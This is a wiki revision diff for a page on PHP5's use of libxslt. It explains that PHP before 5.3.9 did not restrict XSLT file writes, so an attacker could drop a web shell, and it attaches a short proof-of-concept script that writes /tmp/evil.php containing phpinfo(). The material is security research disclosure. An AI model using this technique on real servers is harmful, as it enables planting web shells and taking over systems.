Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version Icon 2.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:27
Change comment: There is no comment for this version
To version Icon 4.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:34
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -2,4 +2,9 @@
2 2  
3 3  
4 4  
5 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted using xsltSetSecurityPrefs(). It was then possible to create / overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
5 +== Creating files ==
6 +
7 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create / overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
8 +
9 +
10 +The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/.
Icon create-file-via-libxslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +601 bytes
Content
... ... @@ -1,0 +1,33 @@
1 +<?php
2 +
3 +$sXml = '<empty/>';
4 +
5 +$sXsl = <<<EOT
6 +<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
7 +
8 + <xsl:template match="/">
9 + <xsl:document href="/tmp/evil.php" method="text">
10 + <xsl:text><![CDATA[<?php phpinfo() ?>]]></xsl:text>
11 + </xsl:document>
12 + </xsl:template>
13 +
14 +</xsl:stylesheet>
15 +EOT;
16 +
17 +# LOAD XML FILE
18 +$XML = new DOMDocument();
19 +$XML->loadXML( $sXml );
20 +
21 +# LOAD XSLT FILE
22 +$XSL = new DOMDocument();
23 +$XSL->loadXML( $sXsl );
24 +
25 +# START XSLT
26 +$xslt = new XSLTProcessor();
27 +$xslt->importStylesheet( $XSL );
28 +
29 +# TRASNFORM & PRINT
30 +print $xslt->transformToXML( $XML );
31 +
32 +?>
33 +